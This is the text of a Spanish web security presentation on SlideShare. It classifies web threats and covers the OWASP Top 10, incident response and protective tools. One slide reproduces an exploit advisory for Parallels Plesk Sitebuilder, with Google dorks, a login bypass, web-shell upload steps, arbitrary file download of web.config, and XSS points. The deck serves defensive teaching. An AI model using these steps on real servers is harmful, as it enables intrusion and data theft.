SlideShare una empresa de Scribd logo

Seguridad en la web

Descargar como PPTX, PDF
Tensor
Tensor

Seguridad en la web

Educación
1 de 87
¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?
¿Puede mi sitio web sufrir un ataque? La respuesta es obvia:
¿Qué puedo hacer?
Introducción a los ataques existentes Clasificación de amenazas WEB Abuso de la funcionalidad: el abuso de funcionalidad es una técnica de ataque que utiliza las propias características y funciones de un sitio web para consumir, defraudar o eludir los mecanismos de control de acceso. Fuerza bruta: una ataque de fuerza bruta es un proceso automatizado de prueba y error que se utiliza para adivinar el nombre de usuario, la contraseña, el número de tarjeta de crédito o la clave criptográfica de una persona. Desbordamiento de almacenamiento intermedio: los exploits de desbordamiento de almacenamiento intermedio son ataques que alteran el flujo de una aplicación sobrescribiendo partes de la memoria. Usurpación de contenido: la usurpación de contenido es una técnica de ataque que se utiliza para hacer creer a un usuario que determinado contenido que aparece en un sitio web es legítimo y no procede de un origen externo.
Introducción a los ataques existentes Clasificación de amenazas WEB Predicción de sesión/credenciales: la predicción de sesión/credenciales es un método de apropiación de identidad o suplantación de un usuario de sitio web. Deducir o adivinar el valor único que identifica la sesión o el usuario concreto que efectúa el ataque. Script entre sitios: el script entre sitios (XSS) es una técnica de ataque que obliga a un sitio web a duplicar el código ejecutable proporcionado por el atacante, que se carga en el navegador de un usuario. Un usuario de un script entre sitios puede verse expropiado de su cuenta (robo de cookies), su navegador puede ser redirigido a otra ubicación, o se le puede mostrar contenido fraudulento en el sitio web que esté visitando. Denegación de servicio: la denegación de servicio (DoS) es una técnica de ataque cuyo objetivo es impedir que un sitio web ofrezca una actividad normal a los usuarios.
Introducción a los ataques existentes Clasificación de amenazas WEB Indexación de directorios: el listado/indexación automática de directorios es una función de servidor que lista todos los archivos en un directorio solicitado si el archivo básico normal (index.html/home.html/default.htm) no está presente. Ataque de serie de formato: los ataques de serie de formato alteran el flujo de una aplicación utilizando características de la biblioteca de formatos de series para acceder a otro espacio de la memoria. Filtrado de información: el filtraje de información se produce cuando un sitio web revela datos confidenciales, por ejemplo comentarios de un desarrollador o mensajes de error, que pueden ayudar a un atacante a aprovecharse del sistema. Anti automatización insuficiente: la anti automatización insuficiente se produce cuando un sitio web permite a un atacante automatizar un proceso que sólo debe realizarse manualmente.
Introducción a los ataques existentes Clasificación de amenazas WEB Autenticación insuficiente: la autenticación insuficiente se produce cuando un sitio web permite a un atacante acceder a contenido o funciones confidenciales sin autenticar correctamente sus permisos de acceso. Autorización insuficiente: la autorización insuficiente se produce cuando un sitio web permite el acceso a contenido o funciones confidenciales que deben requerir un incremento de las restricciones de control de acceso. Validación de proceso insuficiente: la validación de proceso insuficiente se produce cuando un sitio web permite a un atacante eludir el control de flujo previsto de una aplicación. Caducidad de sesión insuficiente: la caducidad de sesión insuficiente se produce cuando un sitio web permite a un atacante reutilizar credenciales de sesión o ID de sesión antiguos para llevar a cabo la autorización. La caducidad de sesión insuficiente aumenta la exposición de un sitio web a los ataques que roban o suplantan a otros usuarios.
Introducción a los ataques existentes Clasificación de amenazas WEB Inyección LDAP: la inyección LDAP es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias LDAP (Lightweight Directory Access Protocol) a partir de entradas proporcionadas por los usuarios. Envío de mandatos del SO: el envío de mandatos del SO es una técnica de ataque utilizada para aprovecharse de los sitios web mediante la ejecución de mandatos del sistema operativo a través de la manipulación de la entrada de la aplicación. Cruce de vía de acceso: la técnica de ataque de cruce de vía de acceso fuerza el acceso a archivos, directorios y mandatos que pueden estar ubicados potencialmente fuera del directorio raíz de documentos. Un atacante podría manipular un URL de forma que el sitio web ejecutará o revelará el contenido de archivos arbitrarios en cualquier parte del servidor web.
Introducción a los ataques existentes Clasificación de amenazas WEB Ubicación de recursos predecible: la ubicación de recursos predecible es una técnica de ataque utilizada para descubrir contenido y funciones ocultas de un sitio web. El ataque, que se vale de considerar la información de la que dispone, es una búsqueda de fuerza bruta en busca de contenido que no está pensado para mostrarse públicamente. Archivos temporales, archivos de copia de seguridad, archivos de configuración y archivos de ejemplo son todos ejemplos de archivos potencialmente sobrantes. Fijación de sesión: la fijación de sesión es una técnica de ataque que fuerza un ID de sesión de usuario a un valor explícito. Inyección SQL: la inyección SQL es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias SQL a partir de entradas proporcionadas por los usuarios. Inyección SSI: la inyección SSI (inclusión del lado del servidor) es una técnica de aprovechamiento del lado del servidor que permite a un atacante enviar código en una aplicación, que posteriormente el servidor web ejecutará localmente.
Introducción a los ataques existentes Clasificación de amenazas WEB Validación de recuperación de contraseña débil: la validación de recuperación de contraseña débil se produce cuando un sitio web permite a un atacante obtener, cambiar o recuperar ilegalmente la contraseña de otro usuario. Inyección XPath: la inyección XPath es una técnica de ataque utilizada para aprovecharse de los sitios web que crean consultas XPath a partir de entradas proporcionadas por los usuarios.
Introducción a los ataques existentes =¿$? Consecuencias derivadas de los ataques
Introducción a los ataques existentes Panorama…
Introducción a los ataques existentes Panorama… Crouching Yeti / Energetic Bear (Verano 2014)
Introducción a los ataques existentes Panorama…
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes http://www.ddossite.com/ http://youtu.be/vn-lU3Zu3dw http://youtu.be/aCacibJa0Ps
Introducción a los ataques existentes http://www.digitalattackmap.com
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:"© Copyright 2004-2007 SWsoft." ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # # version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard 2-uploading shell via Live HTTP Headers(Copyright 2004-2010) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"rn] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"rn] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config 4-xss(all version) you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Introducción a los ataques existentes
Introducción a los ataques existentes
Introducción a los ataques existentes El objetivo principal del TOP 10 OWASP es dar a conocer a los desarrolladores, diseñadores, arquitectos, gerentes, y organizaciones sobre las consecuencias de las vulnerabilidades de seguridad más importantes en aplicaciones web. El TOP 10 provee de técnicas básicas sobre como protegerse en estas áreas de alto riesgo y también provee orientación sobre los pasos a seguir. Que se hable de top 10 no significa que no existan más vulnerabilidades!! Simplemente son las más comunes.
http://youtu.be/dGLM_xjZZms Para muestra… un botón:
http://youtu.be/UtU1gGv9xNw
Evolución OWASP Top 10
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
Consecuencias. Ejemplos prácticos
He sido atacado. ¿Ahora que hago? El procedimiento varía dependiendo de múltiples variables pero podría ser algo así: 1.- Poner el sitio web atacado offline. 2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar FUEGO PURIFICADOR o contratar servicios de desinfección. 3.- Revisar todas las posibles extensiones vulnerables o framework e intentar determinar el punto de entrada. 4.- Reinstalar framework, plugins, plantillas, bbdd, SO, … desde un backup que se sepa que está limpio. Parchear el posible punto de entrada. 5.-Cambiar todas las contraseñas 6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se han podido ver comprometidos datos de importancia, notificar a posibles usuarios afectados el incidente de seguridad.
He sido atacado. ¿Ahora que hago? Denunciar si hemos sido victimas de un ataque Contratar servicios especializados de análisis forense para que en caso de que se quiera llevar a juicio el ataque, se disponga de pruebas válidas con las que afrontar la denuncia.
WAF. Web Application Firewall Herramientas y servicios con los que protegernos Nos protege de: >Vulnerabilidades de sistema operativo >Vulnerabilidades de aplicación SQLi XSS LFI RFI DT … Nos tiene que quedar claro que las aplicaciones y sistemas operativos siguen siendo vulnerables. Parcheo Virtual
WAF. Web Application Firewall Herramientas y servicios con los que protegernos De todos los colores y sabores: >Software (Open Source, Propietarios…) >Virtuales >Hardware >As a Service (En la nube)
Herramientas y servicios con los que protegernos WAF. Web Application Firewall
Herramientas y servicios con los que protegernos Sistemas Anti DDoS
Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
Herramientas y servicios con los que protegernos Autenticación multifactor / Protección de identidades digitales
Herramientas y servicios con los que protegernos Hostings/Housings especializados
Herramientas y servicios con los que protegernos Herramientas de hardening de frameworks especificos, buenas prácticas,… Guía básica seguridad Wordpress Inteco http://www.inteco.es/file/WbpsPPREE7nfCgs9ZBYoAQ Guía básica seguridad Joomla Inteco http://www.inteco.es/file/WbpsPPREE7naXKiMJlkT_g
Herramientas y servicios con los que protegernos http://punkspider.hyperiongray.com
Herramientas y servicios con los que protegernos http://sitecheck.sucuri.net/
Herramientas y servicios con los que protegernos http://zulu.zscaler.com/
Herramientas y servicios con los que protegernos
Herramientas y servicios con los que protegernos
Algunos consejos útiles Contar con profesionales del desarrollo web SEGURO Cuando se contrate el servicio de presencia web hablar de que ocurre en caso de que surjan vulnerabilidades, se sea victima de un ataque, tiempos de parcheo, Plan de contingencia…) Antes de poner una web online comprobar su seguridad (Revisión código, Auditoría WEB) Realizar asiduamente backups tanto de la base de datos como de la aplicación y sus ficheros asociados.
Preparar un Plan de Recuperación ante incidentes. Entrenarse, ponerlo a prueba. No utilizar la misma contraseña para todas las cuentas Cifrar la documentación/datos online importantes Cambia de contraseñas cada cierto tiempo Usuarios y contraseñas personales e intransferibles Tener especial cuidado cuando se manejan datos sensibles (LOPD) Algunos consejos útiles
Utilizar mecanismos de autenticación de múltiples factore. Llevar un control sobre los CMS instalados y los diferentes plugins (seguros)instalados Actualizar y parchear tanto sistemas como aplicaciones Integración de sistemas Captchas para evitar herramientas automatizadas. Contratar hostings, housings con servicios de seguridad adicionales (WAF, ADDoS) Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles
Algunos consejos útiles

Recomendados

Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
Tensor
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
Carlos Javier Majerhua
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
kernelinux
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
Jaime Restrepo
 
Asp seguridad
Asp seguridad Asp seguridad
Asp seguridad
gerardd98
 
WebAttack - Presentación
WebAttack - PresentaciónWebAttack - Presentación
WebAttack - PresentaciónMarcos Miguel Garcia
 

Recomendados

Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
Tensor
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
Carlos Javier Majerhua
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
kernelinux
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
Jaime Restrepo
 
Asp seguridad
Asp seguridad Asp seguridad
Asp seguridad
gerardd98
 
WebAttack - Presentación
WebAttack - PresentaciónWebAttack - Presentación
WebAttack - PresentaciónMarcos Miguel Garcia
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
seguridadelinux
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
Jose Mato
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
Alonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
camposer
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
Alonso Caballero
 
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS
 
01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx
ssusercb51cd
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)
Jaime Restrepo
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
Andrés Gómez
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
lechosopowers
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
Fernando Solis
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
Facultad de Ciencias y Sistemas
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
Héctor López
 
Owasp proyecto
Owasp proyectoOwasp proyecto
Owasp proyecto
Fernando Solis
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de SeguridadJaime Leon
 
Seguridad en servidores
Seguridad en servidoresSeguridad en servidores
Seguridad en servidoresTaty Millan
 
ciberataques
ciberataquesciberataques
ciberataques
ADELAVASQUEZGARCIA
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
Eventos Creativos
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
Francisco José Cruz Jiménez
 
Libertad
LibertadLibertad
Libertad
Tensor
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)
Tensor
 

Más contenido relacionado

Similar a Seguridad en la web

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
seguridadelinux
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
Jose Mato
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
Alonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
camposer
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
Alonso Caballero
 
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS
 
01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx
ssusercb51cd
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)
Jaime Restrepo
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
Andrés Gómez
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
lechosopowers
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
Fernando Solis
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
Facultad de Ciencias y Sistemas
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
Héctor López
 
Owasp proyecto
Owasp proyectoOwasp proyecto
Owasp proyecto
Fernando Solis
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de SeguridadJaime Leon
 
Seguridad en servidores
Seguridad en servidoresSeguridad en servidores
Seguridad en servidoresTaty Millan
 
ciberataques
ciberataquesciberataques
ciberataques
ADELAVASQUEZGARCIA
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
Eventos Creativos
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
Francisco José Cruz Jiménez
 

Similar a Seguridad en la web (20)

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
 
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologíasUNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
UNEG-AS 2012-Inf11: Métodos usados para abusar de las nuevas tecnologías
 
01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx01 - Sesión 09 - Fallos de Seguridad.pptx
01 - Sesión 09 - Fallos de Seguridad.pptx
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
 
Owasp proyecto
Owasp proyectoOwasp proyecto
Owasp proyecto
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Seguridad en servidores
Seguridad en servidoresSeguridad en servidores
Seguridad en servidores
 
ciberataques
ciberataquesciberataques
ciberataques
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
 

Más de Tensor

Libertad
LibertadLibertad
Libertad
Tensor
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)
Tensor
 
Metodo de la bisección
Metodo de la bisecciónMetodo de la bisección
Metodo de la bisección
Tensor
 
Transito vehicular
Transito vehicularTransito vehicular
Transito vehicular
Tensor
 
Teoria de colas
Teoria de colasTeoria de colas
Teoria de colas
Tensor
 
Practica 7 2016
Practica 7 2016Practica 7 2016
Practica 7 2016
Tensor
 
Practica 6 2016
Practica 6 2016Practica 6 2016
Practica 6 2016
Tensor
 
Game maker
Game makerGame maker
Game maker
Tensor
 
Practica 5 2016
Practica 5 2016Practica 5 2016
Practica 5 2016
Tensor
 
Procesamiento de archivos
Procesamiento de archivosProcesamiento de archivos
Procesamiento de archivos
Tensor
 
Cadenas y funciones de cadena
Cadenas y funciones de cadenaCadenas y funciones de cadena
Cadenas y funciones de cadena
Tensor
 
Simulación en promodel clase 04
Simulación en promodel clase 04Simulación en promodel clase 04
Simulación en promodel clase 04
Tensor
 
Reduccion de orden
Reduccion de ordenReduccion de orden
Reduccion de orden
Tensor
 
Variación+de+parametros
Variación+de+parametrosVariación+de+parametros
Variación+de+parametros
Tensor
 
Coeficientes indeterminados enfoque de superposición
Coeficientes indeterminados enfoque de superposiciónCoeficientes indeterminados enfoque de superposición
Coeficientes indeterminados enfoque de superposición
Tensor
 
Bernoulli y ricatti
Bernoulli y ricattiBernoulli y ricatti
Bernoulli y ricatti
Tensor
 
Practica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioPractica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicio
Tensor
 
Clase 14 ondas reflejadas
Clase 14 ondas reflejadasClase 14 ondas reflejadas
Clase 14 ondas reflejadas
Tensor
 
Ondas em
Ondas emOndas em
Ondas em
Tensor
 
Clase 7 ondas electromagneticas
Clase 7 ondas electromagneticasClase 7 ondas electromagneticas
Clase 7 ondas electromagneticas
Tensor
 

Más de Tensor (20)

Libertad
LibertadLibertad
Libertad
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)
 
Metodo de la bisección
Metodo de la bisecciónMetodo de la bisección
Metodo de la bisección
 
Transito vehicular
Transito vehicularTransito vehicular
Transito vehicular
 
Teoria de colas
Teoria de colasTeoria de colas
Teoria de colas
 
Practica 7 2016
Practica 7 2016Practica 7 2016
Practica 7 2016
 
Practica 6 2016
Practica 6 2016Practica 6 2016
Practica 6 2016
 
Game maker
Game makerGame maker
Game maker
 
Practica 5 2016
Practica 5 2016Practica 5 2016
Practica 5 2016
 
Procesamiento de archivos
Procesamiento de archivosProcesamiento de archivos
Procesamiento de archivos
 
Cadenas y funciones de cadena
Cadenas y funciones de cadenaCadenas y funciones de cadena
Cadenas y funciones de cadena
 
Simulación en promodel clase 04
Simulación en promodel clase 04Simulación en promodel clase 04
Simulación en promodel clase 04
 
Reduccion de orden
Reduccion de ordenReduccion de orden
Reduccion de orden
 
Variación+de+parametros
Variación+de+parametrosVariación+de+parametros
Variación+de+parametros
 
Coeficientes indeterminados enfoque de superposición
Coeficientes indeterminados enfoque de superposiciónCoeficientes indeterminados enfoque de superposición
Coeficientes indeterminados enfoque de superposición
 
Bernoulli y ricatti
Bernoulli y ricattiBernoulli y ricatti
Bernoulli y ricatti
 
Practica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioPractica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicio
 
Clase 14 ondas reflejadas
Clase 14 ondas reflejadasClase 14 ondas reflejadas
Clase 14 ondas reflejadas
 
Ondas em
Ondas emOndas em
Ondas em
 
Clase 7 ondas electromagneticas
Clase 7 ondas electromagneticasClase 7 ondas electromagneticas
Clase 7 ondas electromagneticas
 

Último

CALENDARIZACION DEL MES DE JUNIO - JULIO 24
CALENDARIZACION DEL MES DE JUNIO - JULIO 24CALENDARIZACION DEL MES DE JUNIO - JULIO 24
CALENDARIZACION DEL MES DE JUNIO - JULIO 24
auxsoporte
 
Friedrich Nietzsche. Presentación de 2 de Bachillerato.
Friedrich Nietzsche. Presentación de 2 de Bachillerato.Friedrich Nietzsche. Presentación de 2 de Bachillerato.
Friedrich Nietzsche. Presentación de 2 de Bachillerato.
pablomarin116
 
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdfAsistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
Demetrio Ccesa Rayme
 
Fase 2, Pensamiento variacional y trigonometrico
Fase 2, Pensamiento variacional y trigonometricoFase 2, Pensamiento variacional y trigonometrico
Fase 2, Pensamiento variacional y trigonometrico
YasneidyGonzalez
 
Automatización de proceso de producción de la empresa Gloria SA (1).pptx
Automatización de proceso de producción de la empresa Gloria SA (1).pptxAutomatización de proceso de producción de la empresa Gloria SA (1).pptx
Automatización de proceso de producción de la empresa Gloria SA (1).pptx
GallardoJahse
 
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLAACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
JAVIER SOLIS NOYOLA
 
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNETPRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
CESAR MIJAEL ESPINOZA SALAZAR
 
Testimonio Paco Z PATRONATO_Valencia_24.pdf
Testimonio Paco Z PATRONATO_Valencia_24.pdfTestimonio Paco Z PATRONATO_Valencia_24.pdf
Testimonio Paco Z PATRONATO_Valencia_24.pdf
Txema Gs
 
Horarios Exámenes EVAU Ordinaria 2024 de Madrid
Horarios Exámenes EVAU Ordinaria 2024 de MadridHorarios Exámenes EVAU Ordinaria 2024 de Madrid
Horarios Exámenes EVAU Ordinaria 2024 de Madrid
20minutos
 
True Mother's Speech at THE PENTECOST SERVICE..pdf
